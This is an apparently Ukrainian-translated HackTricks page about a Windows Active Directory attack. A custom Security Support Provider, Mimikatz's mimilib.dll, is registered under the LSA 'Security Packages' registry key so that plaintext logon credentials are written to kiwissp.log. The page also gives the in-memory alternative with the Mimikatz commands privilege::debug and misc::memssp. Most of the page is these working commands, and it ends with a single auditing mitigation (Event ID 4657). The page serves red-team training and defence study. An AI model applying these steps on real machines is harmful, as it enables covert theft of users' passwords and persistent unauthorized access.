hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

4.4 KiB
Raw Blame History

Custom SSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Custom SSP

Дізнайтеся, що таке SSP (Security Support Provider) тут.
Ви можете створити свій власний SSP, щоб захопити у відкритому тексті облікові дані, які використовуються для доступу до машини.

Mimilib

Ви можете використовувати бінарний файл mimilib.dll, наданий Mimikatz. Це буде записувати у файл всі облікові дані у відкритому тексті.
Скиньте dll у C:\Windows\System32\
Отримайте список існуючих LSA Security Packages:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Додайте mimilib.dll до списку постачальників підтримки безпеки (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

І після перезавантаження всі облікові дані можна знайти у відкритому вигляді в C:\Windows\System32\kiwissp.log

У пам'яті

Ви також можете безпосередньо впровадити це в пам'ять, використовуючи Mimikatz (зверніть увагу, що це може бути трохи нестабільно/не працювати):

privilege::debug
misc::memssp

Це не переживе перезавантаження.

Пом'якшення

ID події 4657 - Аудит створення/зміни HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks
{% endhint %}